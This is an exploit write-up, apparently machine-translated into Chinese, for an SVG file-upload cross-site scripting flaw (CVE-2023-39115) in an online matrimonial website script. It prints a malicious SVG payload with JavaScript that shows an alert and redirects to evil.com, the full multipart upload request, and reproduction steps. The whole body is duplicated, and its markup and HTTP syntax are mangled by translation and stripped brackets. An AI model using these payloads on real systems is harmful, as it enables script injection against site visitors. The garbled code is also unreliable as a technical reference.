#利用标题:在线婚姻网站系统v3.3-通过恶意SVG文件上传执行代码
#日期: 3-8-2023
#类别: Web应用程序
#利用作者: Rajdip Dey Sarkar
#版本: 3.3
#在: Windows/kali上测试
#CVE: CVE-2023-39115
Description:
-----------------------
一个任意文件上传campcodes在线婚姻中的漏洞
网站系统脚本v3.3允许攻击者通过
上传制作的SVG文件。
SVG有效载荷
-------------------------
?xml版本='1.0'startalone='no'?
!Doctype SVG Public' - //W3C //DTD SVG 1.1 //en''
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon ID='三角形'点='0,0 0,50 50,0'填充='#009900'
冲程='#004400'/
脚本类型='text/javascript'
警报(“你被黑客入侵!”)
window.location.href='https://evil.com'
/脚本
/svg
繁殖的步骤
--------------------------------------------------
-login带有您的学分
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
POST/MYRIMONIAL%20Script/install/aiz-uploader/上传http/1.1
HOST: LOCALHOST
user-agent: mozilla/5.0(Windows NT 10.0; Win64; x64; rv:109.0)
壁虎/20100101 Firefox/115.0
ACCEPT: /
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
X-CSRF-TOKEN3360 I5GQFIPOOKWWI74HFDTFC2KPUP0EGGWB8QF7XD5E
content-type:多部分/form-data;
边界=--------------------------------- 167707198418121100152548123485
内容长度: 1044
Origin: http://localhost
连接:关闭
Referer: http://localhost/Matrimonial%20Script/install/naster/Gallery-image/create
cookie: _session=5gnmkaohppezivuzzjfxqldlmxecd1hmcepwjg;
AcceptCookies=true; xsrf-token=i5gqfipookwwi74hfdtfc2kpup0eggwb8qf7xd5e
sec-fetch-Dest:空
sec-fetch mode: cors
sec-fetch-site:相同原产
-------------------------------------------------------------- 167707198418121100152548123485
content-disposition: form-data;名称='相对路径'
无效的
-------------------------------------------------------------- 167707198418121100152548123485
content-disposition: form-data;名称='名称'
文件(1).svg
-------------------------------------------------------------- 167707198418121100152548123485
content-disposition: form-data;名称='类型'
图像/SVG+XML
-------------------------------------------------------------- 167707198418121100152548123485
content-disposition: form-data;名称='aiz_file';文件名='文件(1).svg'
content-type:图像/svg+xml
?xml版本='1.0'startalone='no'?
!Doctype SVG Public' - //W3C //DTD SVG 1.1 //en''
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon ID='三角形'点='0,0 0,50 50,0'填充='#009900'
冲程='#004400'/
脚本类型='text/javascript'
警报(“你被黑客入侵!”)
window.location.href='https://evil.com'
/脚本
/svg
--------------------------------------------------------------- 16770198418121100152548123485-
#日期: 3-8-2023
#类别: Web应用程序
#利用作者: Rajdip Dey Sarkar
#版本: 3.3
#在: Windows/kali上测试
#CVE: CVE-2023-39115
Description:
-----------------------
一个任意文件上传campcodes在线婚姻中的漏洞
网站系统脚本v3.3允许攻击者通过
上传制作的SVG文件。
SVG有效载荷
-------------------------
?xml版本='1.0'startalone='no'?
!Doctype SVG Public' - //W3C //DTD SVG 1.1 //en''
正在加载...
www.w3.org
polygon ID='三角形'点='0,0 0,50 50,0'填充='#009900'
冲程='#004400'/
脚本类型='text/javascript'
警报(“你被黑客入侵!”)
window.location.href='https://evil.com'
/脚本
/svg
繁殖的步骤
--------------------------------------------------
-login带有您的学分
- 驱逐到此目录- /profile -settings
- 在画廊上单击- 添加新图像- 浏览器- 添加文件
- 选择SVG文件并上传完成
- 单击图像!有效载荷触发
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
POST/MYRIMONIAL%20Script/install/aiz-uploader/上传http/1.1
HOST: LOCALHOST
user-agent: mozilla/5.0(Windows NT 10.0; Win64; x64; rv:109.0)
壁虎/20100101 Firefox/115.0
ACCEPT: /
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
X-CSRF-TOKEN3360 I5GQFIPOOKWWI74HFDTFC2KPUP0EGGWB8QF7XD5E
content-type:多部分/form-data;
边界=--------------------------------- 167707198418121100152548123485
内容长度: 1044
Origin: http://localhost
连接:关闭
Referer: http://localhost/Matrimonial%20Script/install/naster/Gallery-image/create
cookie: _session=5gnmkaohppezivuzzjfxqldlmxecd1hmcepwjg;
AcceptCookies=true; xsrf-token=i5gqfipookwwi74hfdtfc2kpup0eggwb8qf7xd5e
sec-fetch-Dest:空
sec-fetch mode: cors
sec-fetch-site:相同原产
-------------------------------------------------------------- 167707198418121100152548123485
content-disposition: form-data;名称='相对路径'
无效的
-------------------------------------------------------------- 167707198418121100152548123485
content-disposition: form-data;名称='名称'
文件(1).svg
-------------------------------------------------------------- 167707198418121100152548123485
content-disposition: form-data;名称='类型'
图像/SVG+XML
-------------------------------------------------------------- 167707198418121100152548123485
content-disposition: form-data;名称='aiz_file';文件名='文件(1).svg'
content-type:图像/svg+xml
?xml版本='1.0'startalone='no'?
!Doctype SVG Public' - //W3C //DTD SVG 1.1 //en''
正在加载...
www.w3.org
polygon ID='三角形'点='0,0 0,50 50,0'填充='#009900'
冲程='#004400'/
脚本类型='text/javascript'
警报(“你被黑客入侵!”)
window.location.href='https://evil.com'
/脚本
/svg
--------------------------------------------------------------- 16770198418121100152548123485-